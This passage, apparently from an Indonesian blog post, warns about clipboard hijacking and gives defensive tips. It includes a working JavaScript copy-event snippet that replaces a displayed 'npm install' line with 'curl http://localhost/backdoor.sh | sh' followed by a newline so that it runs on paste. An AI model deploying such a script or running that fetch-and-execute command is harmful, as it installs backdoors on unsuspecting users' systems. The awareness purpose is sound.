Di atas merupakan simulasi ketika kita ingin menyalin dan langsung menjalankannya pada terminal, contoh sederhananya lagi ketika kita hendak menginstall suatu package menggunakan npm dan kamu menemukan perintah/command untuk menginstall pada suatu web, tanpa pikir panjang kebanyakan kita langsung menyalin dan paste text tersebut ke terminal. Codepen Copy&Paste.
PROBLEM: Satu lagi masalahnya disini peretas langsung melakukan enter dengan code (\n) setelah baris perintah berbahaya, jadi perintah yang di salin langsung otomatis terjalankan.
Contoh Script yang digunakan:
<p id="copy">npm install package</p> <script> document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://localhost/backdoor.sh | sh\n'); e.preventDefault(); }); </script>
Bagaimana menghindarinya?
- Pastikan Website yang kita kunjungi terpercaya dan sudah terjamin, contohnya ketika ingin mencari dokumentasi atau package langsung kesitus resminya.
- Untuk Berjaga-jaga , jangan langsung paste text yang sudah di copy ke terminal , cobalah untuk paste ke notepad atau text editor lainnya.
- Intinya jangan langsung menempelkan text ke terminal.
# Pesan Penulis
Selalu hati-hati dan waspada , karena kita tidak tau kejahatan apa yang akan kita hadapi nantinya.
Cukup itu yang dapat saya berikan, semoga bermanfaat. Terimakasih 😁